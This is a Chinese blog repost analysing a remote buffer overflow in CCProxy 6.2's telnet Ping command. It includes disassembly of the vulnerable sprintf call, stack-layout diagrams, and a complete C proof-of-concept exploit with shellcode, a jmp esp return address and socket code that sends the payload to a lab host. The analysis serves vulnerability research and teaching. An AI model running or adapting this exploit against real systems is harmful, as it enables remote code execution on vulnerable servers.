[转自luoluo's blog]CCProxy远程缓冲区溢出分析

最新推荐文章于 2024-04-07 21:20:14 发布
原创 最新推荐文章于 2024-04-07 21:20:14 发布 · 2k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#blog #buffer #socket #byte #代理服务器软件 #服务器软件

本文对CCProxy的远程缓冲区溢出漏洞进行分析。测试环境为windows2003 + CCProxy 6.2,该软件的Ping命令参数提交过长字符串会导致缓冲区溢出。漏洞源于处理结果回显数据时使用无边界检查的sprintf函数,还给出利用jmp esp的测试程序。 
CCProxy远程缓冲区溢出分析

luoluo [luoluonet@hotmail.com]

CCProxy的缓冲区溢出攻击代码早已公布,但是我并没有能找到漏洞的相关说明,以下就对
这个简单的缓冲区溢出漏洞作简要分析。偶水平很菜,加上糟糕的文字,错误和不足处,
请各位指教,感激不尽。

测试环境:windows2003 + CCProxy 6.2

CCProxy是一款轻量级的代理服务器软件,该服务器软件提供了远程telnet功能,telnet进
去后可以执行简单的命令,其中的Ping(P)命令的参数如果提交过长的字符串的话,就会造
成缓冲区溢出,攻击者可以利用这个漏洞在远程主机上执行任意代码。

该漏洞主要是由于在处理Ping命令的结果回显数据时,使用sprintf函数格式化字符串,该
函数没有边界检查,导致溢出从而可以改变程序流程执行任意代码。

漏洞代码:

_text:00430300 sub_0_430300    proc near               ; CODE XREF: sub_0_426B20+20p
_text:00430300 
_text:00430300 var_468         = dword ptr -468h
_text:00430300 s               = dword ptr -464h
_text:00430300 var_458         = dword ptr -458h
_text:00430300 var_454         = dword ptr -454h
_text:00430300 var_450         = dword ptr -450h
_text:00430300 var_44C         = dword ptr -44Ch
_text:00430300 var_448         = byte ptr -448h
_text:00430300 var_438         = dword ptr -438h
_text:00430300 in              = in_addr ptr -434h
_text:00430300 var_430         = dword ptr -430h
_text:00430300 var_42C         = byte ptr -42Ch
_text:00430300 var_428         = byte ptr -428h
_text:00430300 var_418         = byte ptr -418h
_text:00430300 buf             = byte ptr -414h
_text:00430300 var_404         = byte ptr -404h
_text:00430300 var_403         = byte ptr -403h
_text:00430300 var_34          = dword ptr -34h
_text:00430300 var_20          = dword ptr -20h
_text:00430300 name            = dword ptr -4
_text:00430300 arg_8           = dword ptr  0Ch
_text:00430300 
_text:00430300                 sub     esp, 430h
_text:00430306                 push    ebx
_text:00430307                 push    ebp
_text:00430308                 mov     ebp, ecx
_text:0043030A                 push    esi
_text:0043030B                 push    edi
_text:0043030C                 mov     ecx, 100h
_text:00430311                 lea     ebx, [ebp+8]
_text:00430314                 mov     byte ptr [ebp+1008h], 0
_text:0043031B                 lea     edi, [esp+440h+var_403]
_text:0043031F                 push    1               ; protocol
_text:00430321                 mov     byte ptr [ebx], 0
_text:00430324                 mov     al, byte_0_47B338
_text:00430329                 mov     [esp+444h+var_404], al
_text:0043032D                 xor     eax, eax
_text:0043032F                 repe stosd     // 缓冲区清空 400h = 1024,调试程
序时发现这里的缓冲区起始位置比分配的位置后移了一个字节,不知道是什么原因
_text:00430331                 mov     ecx, [esp+444h+arg_8]
_text:00430338                 push    3               ; type
_text:0043033A                 push    2               ; af
_text:0043033C                 mov     [ebp+0], ecx
_text:0043033F                 call    ds:socket
_text:00430345                 cmp     eax, 0FFFFFFFFh
_text:00430348                 mov     [esp+44Ch+var_438], eax
_text:0043034C                 jnz     short loc_0_430367
_text:0043034E                 push    offset aSocket  ; "socket()"
_text:00430353                 mov     ecx, ebp
_text:00430355                 call    sub_0_430710
_text:0043035A                 pop     edi
_text:0043035B                 pop     esi
_text:0043035C                 pop     ebp
_text:0043035D                 pop     ebx
_text:0043035E                 add     esp, 430h
_text:00430364                 retn    0Ch
_text:00430367 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?
_text:00430367 
_text:00430367 loc_0_430367:                           ; CODE XREF: sub_0_430300+4Cj
_text:00430367                 mov     esi, [esp+44Ch+name]
_text:0043036E                 push    esi             ; name
_text:0043036F                 call    ds:gethostbyname
_text:00430375                 test    eax, eax
_text:00430377                 jnz     short loc_0_4303DF
_text:00430379                 push    esi               // 第三个参数,Ping命令的参数
_text:0043037A                 lea     edx, [esp+454h+buf]
_text:0043037E                 push    offset aHostNotFoundS ; "Host not found: %s/r/n"
_text:00430383                 push    edx               // 第一个参数,目标缓冲区
_text:00430384                 call    _sprintf          // 调用sprintf函数  导致溢出
_text:00430389                 lea     edi, [esp+45Ch+buf]
_text:0043038D                 or      ecx, 0FFFFFFFFh
_text:00430390                 xor     eax, eax
_text:00430392                 add     esp, 0Ch
_text:00430395                 repne scasb
_text:00430397                 not     ecx
_text:00430399                 sub     edi, ecx
_text:0043039B                 push    eax             ; flags
_text:0043039C                 mov     esi, edi
_text:0043039E                 mov     edx, ecx
_text:004303A0                 mov     edi, ebx
_text:004303A2                 or      ecx, 0FFFFFFFFh
_text:004303A5                 repne scasb
_text:004303A7                 mov     ecx, edx
_text:004303A9                 dec     edi
_text:004303AA                 shr     ecx, 2
_text:004303AD                 repe movsd
_text:004303AF                 mov     ecx, edx
_text:004303B1                 and     ecx, 3
_text:004303B4                 repe movsb
_text:004303B6                 lea     edi, [esp+454h+buf]
_text:004303BA                 or      ecx, 0FFFFFFFFh
_text:004303BD                 repne scasb
_text:004303BF                 not     ecx
_text:004303C1                 dec     ecx
_text:004303C2                 lea     eax, [esp+454h+buf]
_text:004303C6                 push    ecx             ; len
_text:004303C7                 mov     ecx, [ebp+0]
_text:004303CA                 push    eax             ; buf
_text:004303CB                 push    ecx             ; s
_text:004303CC                 call    ds:send
_text:004303D2                 pop     edi
_text:004303D3                 pop     esi
_text:004303D4                 pop     ebp
_text:004303D5                 pop     ebx
_text:004303D6                 add     esp, 430h
_text:004303DC                 retn    0Ch
_text:004303DF ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪?


调用sprintf前当前的堆栈的情况:

+---------+---------+------------------------+------------+----------+---------+--------+
|   esp   |  data   | dst buffer of sprintf  |  4 bytes   |  eip     |  data   |  ebp   |
+---------+---------+------------------------+------------+----------+---------+--------+
                    |<----  1024 bytes   --->|

格式化字符串的长度是16 bytes,只要我们Ping命令的主机名为1016 bytes数据,就可以刚
好覆盖eip,从而改变程序流程,在返回时,esi里存放的地址正好落在一个存放主机名的
buffer拷贝里,可以搜寻系统里的jmp esi的地址作为返回地址来定位shellcode。

如果要用jmp esp来执行shellcode,则麻烦一些,因为在漏洞程序部分使用主机名是一份拷贝,
在前面拷贝时,源缓冲区和目标缓冲相邻,如果主机名大于1024 bytes,大于1024 bytes的部
分会被拷贝的部分填充,所以如果直接把shellcode跟在要用来覆盖eip的地址后面不可行。
但是不是没有办法,因为填充的内容就是源缓冲区的前1024 bytes,而拷贝的长度由源串的长
度决定,可以发送一个长度不小于1024+(len of shellcode)的主机名,并且shellcode填充在
主机名的最前面,这样拷贝时shellcode会被拷贝到目标缓冲区的后面,就可以利用jmp esp来
定位shellcode。

图Copy前:

+-----+------+-----------+--------------+--------------+------+--------------+------
| esp | data | shellcode | filling data | addr jmp esp | nops | filling data | data ...
+-----+------+-----------+--------------+--------------+------+--------------+------
             |<--------   1024 bytes source buffer  --------->|<- start of dst buffer    
                                                              
图Copy后:

--+-----------+--------------+--------------+------+--------------+--------------+--------------+------+-----------+--
..| shellcode | filling data | addr jmp esp | nops |  shellcode   | filling data | addr jmp esp | nops | shellcode |..
--+-----------+--------------+--------------+------+--------------+--------------+--------------+------+-----------+--
  |<--------   1024 bytes source buffer  --------->|<---- start of dst buffer                   |<-- esp when ret
                                                   |<---- hostname buff to be formatted by sprintf


附带一个在win2003上利用jmp esp的简单测试程序(非安全返回):

//-----------------------------------------------------------------
// A test script (jmp esp) for ccproxy 6.22 on win2k3
// and it only opens a cmd window for funny. :)
// and it dosen't return safely, if the cmd window
// was closed, an exception will be thrown out
// and the application will exit.
//
// created by luoluo luoluo_at_hotmail.com
//-----------------------------------------------------------------

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <winsock.h>

#pragma comment(lib, "ws2_32")

bool send_buff(char *, int);

unsigned char shellcode[] = 
		// decoder
		"/x8B/xC4/x83/xC0/x49/x80/x30/x99"
		"/x83/xC0/x29/x80/x30/x99/x83/xC0/x2E/x80/x30/x99"
		// system("cmd.exe")
		"/x55/x51/x52/x8B/xEC/x83/xEC/x20/x33/xC9"
		"/xC6/x45/xF5/x6D/xC6/x45/xF6/x73"
		"/xC6/x45/xF7/x76/xC6/x45/xF8/x63"
		"/xC6/x45/xF9/x72/xC6/x45/xFA/x74"
		"/xC6/x45/xFB/x2E/xC6/x45/xFC/x64"
		"/xC6/x45/xFD/x6C/xC6/x45/xFE/x6C"
		"/xC6/x45/xFF/x99/x8D/x45/xF5/x50"
		"/xB9/x0D/x85/xE1/x77/xFF/xD1/x8B/xD0"
		"/xC6/x45/xF5/x73/xC6/x45/xF6/x79"
		"/xC6/x45/xF7/x73/xC6/x45/xF8/x74"
		"/xC6/x45/xF9/x65/xC6/x45/xFA/x6D"
		"/xC6/x45/xFB/x99/x8D/x45/xF5/x50"
		"/x52/xB9/xFB/x2D/xE1/x77/xFF/xD1/x8B/xD0"
		"/xC6/x45/xF5/x63/xC6/x45/xF6/x6D"
		"/xC6/x45/xF7/x64/xC6/x45/xF8/x2E"
		"/xC6/x45/xF9/x65/xC6/x45/xFA/x78"
		"/xC6/x45/xFB/x65/xC6/x45/xFC/x99"
		"/x8D/x45/xF5/x50/xFF/xD2/x83/xC4"
		"/x04/x8B/xE5/x5A/x59/x5D";

unsigned char jmp_esp[] = "/x46/x7a/xe1/x77";


unsigned char padding[] = "/x90/x90/x90/x90"
			  "/x90/x90/x90/x90";

void main()
{
	char buff[2048];
	int i;
	int filling_size;
	char buff2send[2048];

	memset(buff, 0, 2048);

	strcpy(buff, "/x90/x90/x90/x90");
	strcat(buff, (const char *)shellcode);
	
	filling_size = 1024 - 4 - strlen((const char *)shellcode) - strlen((const char *)padding) - 4;

	for (i = 0; i < filling_size; i ++)
		strcat(buff, "/x90");

	strcat(buff, (const char *)jmp_esp);
	strcat(buff, (const char *)padding);

	for (i = 0; i < 400; i ++)
		strcat(buff, "/x90");

	memset(buff2send, 0, 2048);
	sprintf(buff2send, "p %s/r/n", buff);

	//---------------------------------------------------
	send_buff(buff2send, strlen(buff2send));
}

bool send_buff(char *buffer, int buff_size) 
{

	WSADATA WSAData;
	SOCKET s;
	SOCKADDR_IN addr_in;
	char recv_buff[4096];
	int bytes_recv = 0;
	int bytes_send = 0;

	//---------------------------------------------------
	if (WSAStartup(MAKEWORD(2, 0), &WSAData) != 0)
	{
		printf("WSAStartup failed./n");
		return false;
	}

	//----------------------------------------------------------
	if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
	{
		printf("socket error./n");
		return false;
	}

	//-----------------------------------------------------------
	addr_in.sin_family = AF_INET;
	addr_in.sin_port = htons(23);
	addr_in.sin_addr.S_un.S_addr = inet_addr("192.168.1.2");

	if (connect(s, (SOCKADDR *)&addr_in, sizeof(addr_in)))
	{
		printf("connect error./n");
		return false;
	}

	//------------------------------------------------------
	memset(recv_buff, 0, 4096);

	bytes_recv = recv(s, recv_buff, 4096, 0);

	if (bytes_recv == SOCKET_ERROR)
	{
		printf("recv error./n");
		return false;
	}
	else if (! bytes_recv)
	{
		printf("connection closed./n");
		return false;
	}

	printf("%d : %s/n", buff_size, recv_buff);

	//----------------------------------------------------------------
	bytes_send = send(s, buffer, buff_size, 0);

	if (bytes_send == SOCKET_ERROR) 
	{
		printf("send error./n");
		return false;
	}

	printf("%d bytes has been sent : %S/n", buff_size, buffer);

	//------------------------------------------
	closesocket(s);
	WSACleanup();
	return true;
}

-----------------EOF-------------------
针对CCProxy 6.2缓冲区溢出
flamingobaby的博客
04-15 1897
溢出对象:CCProxy 6.2 调试工具: WinDbg,pattern.py 实验环境: Windows XP sp1或sp2,kali Linux 漏洞说明: CCProxy在代理Telnet协议时,可以接受 Ping命令 。Ping命令格式:ping hostname\r\n 。 当hostname的长度大于或者等于1010字节时,CCProxy 6.2会发生缓冲区溢出,导致程序...
缓冲区溢出漏洞攻击演示实验
热门推荐
Mr.Buffoon
10-07 1万+
实验内容: 分析缓冲区溢出漏洞,利用CCProxy 6.2的这个缓冲区溢出漏洞,利用ping命令向其发送一个长的字符串,溢出局部变量,覆盖RET的位置,从而实现程序跳到自己想要让其执行的程序上去。   定位RET   寻找跳指令地址   构造shellcode   定位shellcode存放位置   编写攻击程序 实验环境: 攻击主机:
CCProxy远程溢出漏洞分析
03-04
CCProxy是一个国产的支持HTTP、FTP、Gopher、SOCKS4/5、Telnet、Secure(HTTPS)、News(NNTP)、 RTSP、MMS等代理协议的代理服务器软件。因为其简单易用、界面友好,非常适合在对流量要求不高的网络环境中使用,所以在国内有很多初级的网管喜欢用这个软件。笔者在测试发现CCProxy 6.0版本存在多处缓冲区溢出漏洞,可以导致攻击者远程执行任意代码。
缓冲区溢出攻击.pdf
04-15
介绍linux系统下,gcc编译的c代码如何利用缓冲区溢出修改函数返回地址和参数,实现攻击,含函数栈帧的分析
CCProxy缓存区溢出攻击代码
my2005lb的专栏
03-19 2223
针对CCProxy6.2的一个缓存区溢出漏洞(telnet到CCProxy服务器,当执行ping命令主机名输入超过1012字节时),实现Shellcode的代码注入。      #include #include #include #pragma comment (lib,"ws2_32") // jmp esp address of chinese version
luoluo优化专题-执行计划
08-17
在"luoluo优化专题"中,你可能学到如何解读执行计划,包括分析操作符的顺序、估计的成本和实际的执行时间。通过执行计划,你可以识别性能瓶颈,如慢速的索引、过多的排序或连接操作。优化器会根据统计信息选择最佳...
luoluo13_math-modeling_29456_1757180186054.zip
最新发布
09-08
在数学建模过程中,首先需要对实际问题进行深入的分析,明确建模的目的和范围,然后根据问题的特点选择合适的数学工具和方法。常见的数学建模方法包括线性规划、非线性规划、随机过程、微分方程、优化方法、算法设计...
VB语法高亮换为HTM与RTF格式的实现代码
该技术的核心目标是将原始的VB代码通过语法分析,识别出关键字、注释、字符串、数字、函数名等不同类型的代码元素,并为它们赋予不同的颜色和字体样式,从而提升代码的可读性与维护性。在此基础上,进一步将加亮后的...
Tao+Analysisi
07-28
### 陶哲轩《数学分析》知识点概览 #### 一、引言 陶哲轩(Terence Tao)是世界著名的数学家之一,《数学分析》是他撰写的一套经典的数学教材,该书分为两卷,旨在为学生提供一个系统且深入学习数学分析的机会。...
c#创建一个用于存储某公司员工信息的类,并且可以通过索引来访问员工的姓名和年龄。(提示:使用字典) Employee employee = new Employee();/employee[22] = "fanfan"; // 员工年龄22,名字 fanfan //employee[22] = "luoluo"; // 员工年龄22,名字 luoluo //employee[23] = "Bob"; //// 员工年龄23,名字 Bob //employee["aa"] = 25; //employee["Bob"] = 29; //修改Bob的年龄为29
05-14
嗯,用户想在C#中创建一个类来存储员工信息,并通过索引访问姓名和年龄,可能要用字典实现键值对。首先,我需要考虑如何设计这个类。用户提到可能需要字典,所以可能每个员工的信息要存在字典里,比如姓名和年龄作为...
缓冲区溢出攻击
11-21
缓冲区溢出攻击 在Windows XP平台上,根据CCproxy缓冲区溢出的原理,编程实现向CCproxy发送ping命令,导致CCproxy产生缓冲区溢出
逆向分析如何发现CCProxy远程溢出漏洞
weixin_33698043的博客
05-11 439
2019独角兽企业重金招聘Python工程师标准>>> ...
CCPROXY漏洞利用
panfengblog
11-02 2486
CCPROXY漏洞利用 CCProxy是一款非常流行的下载量最大的的国产代理服务器软件,其CCProxy 6.2版本存在一个栈溢出漏洞,可以通过此漏洞进行shellcode攻击,以下是学习过程的一个小记录吧 : ) 1.找到并定位溢出点 使用ping命令加一个超长的字符串加一个主机名,代理端会返回Host not found。 当输入的字符串足够长时(比如2000个a),软件就会溢出奔溃,通过二分法尝试,发现ping后最多接1009个字符,第1010字符开始溢出,并且前四字节无用,如下图,当输入
漏洞大户ccproxy又暴远程溢出漏洞
weixin_30394669的博客
11-22 346
漏洞大户ccproxy又暴远程溢出漏洞作者:wolfboy[彭峙酿e.s.t]ccproxy 是一款国生产使用方便界面整洁的代理软件,他支持HTTP,FTP,SOCKS4/5,TELNET,HTTPS.....等代理协议,是一款不可多得的好软件,一般网管用代理软件的时候他是首选,国内ccproxy运用的十分广泛。这不,我们学校的校园网也用上他了,我们电脑老师也是个比较注意网络安全的人,他装的时候...
漏洞利用与缓冲区溢出攻击
weixin_62304542的博客
07-31 768
漏洞利用与缓冲区溢出攻击
网络安全实验:CCProxy缓冲区溢出攻击
程哥哥的一亩三分地
04-17 7422
CCProxy缓冲区溢出实验 一.实验环境说明 溢出对象:CCProxy(一款代理服务器软件,支持FTP和Telnet) 调试工具:CDB、WinDbg、OllyDBG、IDA Pro etc 实验环境:VMware Workstation Pro、windows xp sp3(关闭dep)、python3、ActivePerl Windows XP SP3关闭DEP的方法:编辑C:\boot.ini文件,将/noexecute=optin 改为 /execute,重启系统 二.测试CCProxy是否存在漏
CVE漏洞攻击——ccproxy溢出
qq_43840665的博客
04-17 4780
CCProxy6.2溢出漏洞 虚拟机:VirtualBox 6.1.30 操作系统:WindowsXP SP2 主机OS:Microsoft Windows10 CVE编号:CVE-2004-2685 安装共享文件夹 按照下面箭头指向程序,然后再虚拟机设置中自动挂载一个主机的共享文件夹 2. 关闭winxp的DEP 使系统显示C:\boot.ini 修改DEP选项 查询虚拟机IP并连接ccproxy 命令提示符中输入ipconfig可以获得ip地址,或者使用127.0.0.1
CCProxy 6.2 溢出漏洞分析
w4y2'blog
04-03 4239
操作系统:Microsoft windows XP SP3 溢出软件CCPROXY            http://pan.baidu.com/s/1pJI0loZ   CCProxy于2000年6月问世,是国内最流行的下载量最大的的国产代理服务器软件。主要用于局域网内共享宽带上网,ADSL共享上网、专线代理共享、ISDN代理共享、卫星代理共享、蓝牙代理共享和二级代理等共享代理上网
CCproxy缓冲区溢出攻击,对栈溢出的学习和利用
weixin_69815073的博客
04-07 2980
CCproxy漏洞利用学习
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值